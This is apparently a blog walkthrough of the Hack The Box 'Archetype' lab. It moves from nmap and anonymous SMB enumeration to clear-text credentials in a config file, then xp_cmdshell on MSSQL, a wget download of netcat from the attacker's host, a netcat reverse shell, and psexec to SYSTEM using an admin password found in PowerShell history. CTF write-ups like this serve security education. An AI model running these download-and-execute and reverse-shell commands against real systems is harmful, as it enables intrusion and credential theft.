DEV Community

Gabe
Gabe

Posted on • Edited on

Hack The Box  -  Archetype Walkthrough

This box gives exposure to:
Protocols
MSSQL
SMB
Powershell
Reconnaissance
Remote Code Execution
Clear Text Credentials
Information Disclosure
Anonymous/Guest Access

Starting off with the ping command to verify that my machine can reach the target machine.

Screenshot 1: Ping commandScreenshot 1: Ping command

ping {target_ip_address}

Additionally, when a packet is sent, it typically starts with an initial Time To Live (TTL) value set by the operating system (OS). By looking at the TTL of the packet we can GUESS the OS running on our target machine. Keep in mind that initial TTL values can be modified.

Common initial TTL values include:

Windows: Initial TTL of 128.
Linux/Unix: Initial TTL of 64.
Cisco routers: Initial TTL of 255.

We also see that a Microsoft SQL Server is running on port 1433 with Microsoft Windows Server 2008.

Looking at the output of the ping command in Screenshot 1, we can see that the TTL is equal to 127, so we can also guess the target machine is running Windows.

“But Gabe you just said that the TTL of Windows is 128 not 127 ☝🏽🤓”
Note that each router that forwards the packet decreases the initial TTL value by one. By the time the packet arrives at its destination (our host machine), the TTL value will have been reduced by the number of hops it took to reach us. Meaning we can assume one hop from the target machine to our machine.


Screenshot 2a: Nmap scanScreenshot 2a: Nmap scan

Time for some enumeration with Nmap. Here we are using the Nmap command to scan for any open TCP ports on our target machine using the following options:

nmap -sC -sV -T4 {target_ip_address}

-sC (Default Script Scan): Runs a set of default Nmap Scripting Engine (NSE) scripts against the target. These scripts perform various tasks such as checking for common vulnerabilities, retrieving system information, and more.
-sV (Version Detection): Tries to determine the version of the services running on open ports by sending various probes and analyzing the responses. This helps identify the specific software and version running on a port.
-T4 (Timing Template 4): Sets the timing template to “aggressive,” which speeds up the scan by reducing wait times between probes and increasing parallelization. It’s faster than the default but may increase the likelihood of detection and missed open ports.


Screenshot 2b: Nmap scan cont.Screenshot 2b: Nmap scan cont.

Looking at the output of the initial Nmap scan in Screenshot 2b we can see that SMB ports are open. SMB uses either IP port 139 or 445.

Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.

We also see that a Microsoft SQL Server is running on port 1433 with Microsoft Windows Server 2008.

“What’s SMB used for anyway?☝🏽🤓

SMB (Server Message Block) is a protocol used for sharing resources like files and printers on a network. Essentially, SMB makes it easy to share resources over a network, with Windows having it natively supported and Linux requiring a bit of setup with the open-source software suite, Samba.
Now we can use a tool called smbclient from the Impacket library, which is a powerful collection of Python classes for working with network protocols.


Screenshot 3a: Smbclient enumerationScreenshot 3a: Smbclient enumeration

*smbclient -N -L \\{target_ip_address}\*

-N: No password
-L: This option allows you to look at what services / shares are available on a server

If we look at the output of the smbclient command in Screenshot 3a we are presented with a few notable shares. Running the following command we can try to access each share using the -N (No password) option followed by the target IP address and the Sharename.


Screenshot 3b: Smbclient enumeration cont.Screenshot 3b: Smbclient enumeration cont.

smbclient -N \\{target_ip}\{sharename}

Once successfully connected to the backups share, I noticed a file named prod.dtsConfig. After using the get {filename} command to download the file to our host machine we exit our connection to the share.


Screenshot 4: Clear text user credentialsScreenshot 4: Clear text user credentials

Back in our host machine we can use the cat command to display the output of prod.dtsConfig to our screen where we find our first set of clear-text credentials for a user sql_svc with a password of M3g4C0rp123.

Screenshot 5: MSSQL user authentication using mssqlclientScreenshot 5: MSSQL user authentication using mssqlclient

In Screenshot 5, we use a tool called mssqlclient (also from the Impacket library to authenticate to the SQL server where we can begin interacting with it.

mssqlclient.py -windows-auth {domain/user}@{target_ip}

-windows-auth: Specifies to authenticate to the SQL Server using Windows authentication.

After running the command, we are prompted to enter the password for the sql_svc user which we found in previously in the prod.dtsConfig. Mssqlclient confirms that it has successfully connected to the SQL Server and changed the necessary settings. Shows the SQL Server version (Microsoft SQL Server 140 3232). We are then provided with an interactive SQL prompt (ARCHETYPE\sql_svc dbo@master) where we can enter and execute SQL commands directly on the server.


Screenshot 6: Checking of our user’s role in the serverScreenshot 6: Checking of our user’s role in the server

In Screenshot 6, we are executing SQL queries to check our role and user identity.
SELECT is_srvrolemember(‘sysadmin’)
This SQL query checks if the current user is a member of the ‘sysadmin’ server role. Returns 1 if the user is a member of the ‘sysadmin’ role, 0 if not, and NULL if the role does not exist.
We receive a 1 back indicating that our current user is a member of the ‘sysadmin’ role.

We can also see below that we first tried to use the ‘whoami’ command directly into the SQL Server and we got back an error. This didn't work because ‘whoami’ is a command for the operating system, not for SQL Server. SQL Server didn’t recognize it and gave an error.


Screenshot 7: Command execution on MSSQL serverScreenshot 7: Command execution on MSSQL server

In Screenshot 7, we show that we can use the xp_cmdshell feature to correctly run the whoami command at the operating system level, allowing the SQL Server to run it and show the current domain\user.


Screenshot 8: Checking current directoryScreenshot 8: Checking current directory

After checking for the name of our current user I also wanted to note the directory we were currently located in.

xp_cmdshell ”powershell -c pwd”

powershell: This launches PowerShell, which is a powerful command-line shell and scripting language in Windows.
-c: This tells PowerShell to execute the following command.
pwd: This is a PowerShell command that stands for “print working directory”. It shows the current directory (folder) that PowerShell is operating in.

The output shows we are located at C:\Windows\system32.

“But why does knowing the folder we’re located in matter ☝🏽🤓”

Imagine you’re in a big office building, and someone asks you to find a specific file. If they tell you the file is in the accounting department’s office (a specific room), it’s much easier to locate the file. Similarly, knowing the current directory (C:\Windows\system32) tells you exactly where you are on the computer, so you can find or place files correctly.


Screenshot 9: Checking for folders with write permissionsScreenshot 9: Checking for folders with write permissions

Next, I wanted to take a look into our current user’s directory for a good place to drop a tool called nc64.exe with the following command:

xp_cmdshell ”powershell -c dir C:\Users\sql_svc”

Netcat, often abbreviated as “nc,” is a versatile networking tool that can read and write data across network connections. By dropping the Netcat tool on the target Windows machine, we can set up a way to connect to that remote computer’s command line. This allows us to run commands and check the system without being physically present.


Screenshot 10: Setting up http server for netcat uploadScreenshot 10: Setting up http server for netcat upload

In screenshot 10, I start up a simple HTTP server on port 1337 on our host machine to make the current directory accessible over the network. This starts a server that will make our nc64.exe file available at http://:1337.

sudo python -m http.server 1337

sudo: Allows you to run commands with superuser (administrator) privileges. It’s often needed for tasks that require higher permissions.
python -m http.server: This part uses Python to start a simple HTTP server. Python has a built-in module called http.server that makes it easy to serve files over the web.
1337: This specifies the port number on which the server will listen. Ports are like channels through which data is transmitted over the network. In this case, the server is using port 1337.


Screenshot 11: Pulling netcat executable from out http server on port 1337Screenshot 11: Pulling netcat executable from out http server on port 1337

xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget http://{host_ip_address}:1337/nc64.exe -outfile nc64.exe”

powershell: You know what this does by now hopefully
-c: Same here, if not scroll back to screenshot 8.
cd C:\Users\sql_svc\Downloads: This changes the directory to C:\Users\sql_svc\Downloads where the file will be downloaded.
wget http://{host_ip_address}:1337/nc64.exe -outfile nc64.exe: This uses the wget command to download a file from http://{host_ip_address}/nc64.exe and saves it as nc64.exe in the current directory.

We have now successfully dropped nc64.exe onto our target Windows machine.


Screenshot 12: Setting up netcat listenerScreenshot 12: Setting up netcat listener

sudo nc -nvlp 4444

sudo: This command allows a permitted user to execute a command as the superuser or another user, as specified by the security policy. In this case, it runs the nc command with elevated privileges.
nc: This is the Netcat utility, often referred to as the “Swiss Army knife” of networking. It can read and write data across network connections using the TCP/IP protocol.
-n: This option tells Netcat not to do DNS lookups on the IP addresses, which speeds up the process.
-v: This option enables verbose mode, providing more detailed output.
-l: This option tells Netcat to listen for an incoming connection rather than initiate a connection.
-p 4444: This specifies the port number that Netcat will listen on. In this case, we chose port 4444.


Screenshot 13: Binding cmd.exe through our netcat listenerScreenshot 13: Binding cmd.exe through our netcat listener

xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe {host_ip_address}:4444”

powershell -c cd C:\Users\sql_svc\Downloads;: This changes the directory to C:\Users\sql_svc\Downloads where the nc64.exe file is located.
.\nc64.exe -e cmd.exe 10.10.14.54 4444: This runs the nc64.exe (Netcat) program with specific options:
-e cmd.exe: This option tells Netcat to execute cmd.exe (Command Prompt) once a connection is established.
{host_ip_address} 4444: These specify the IP address (10.10.14.54) and port (4444) to connect to. This is where the listener (from the previous screenshot) is waiting for connections.


Screenshot 14: Reverse shellScreenshot 14: Reverse shell

Here we have created what’s known as a “reverse shell”. A type of network connection where a computer (the “target”) initiates a connection to another computer (the listener) and gives control over its command line interface to us. Using the whoami command here shows we are executing commands directly on the target machine as sql_svc.


Screenshot 15: User flagScreenshot 15: User flag

Taking a look into the user’s Desktop, we find a user.txt file. Using type user.txt we can see the contents of the file revealing our user flag.


Screenshot 16: Checking PowerShell history to find clear text admin credentialsScreenshot 16: Checking PowerShell history to find clear text admin credentials

In screenshot 16 we cd *(change directory) into **Roaming\Microsoft\Windows\Powershell\PSReadline* then output the contents of the directory with the dir command. The **ConsoleHost_history.txt file within this directory stores command history. This means you can refer back to previous commands used by a user on the machine. Here is where we find our clear text admin credentials


Screenshot 17: Privilege escalation via psexec.pyScreenshot 17: Privilege escalation via psexec.py

In screenshot 17, we use psexec.py, a Python script that is part of the Impacket library, which provides a way to execute commands on remote Windows machines.

psexec.py administrator@{target_ip_address}

We can now enter the user (administrator) and password (MEGACORP_4dm1n!!) which we found from checking the console history.
Using whoami we see that we are working as NT AUTHORITY\SYSTEM, a built-in, highly privileged account that Windows uses to run essential system services and processes, with full control over the system.


Screenshot 18: Root flagScreenshot 18: Root flag

Checking the Administrator’s Desktop we find the second and final root flag.

Top comments (0)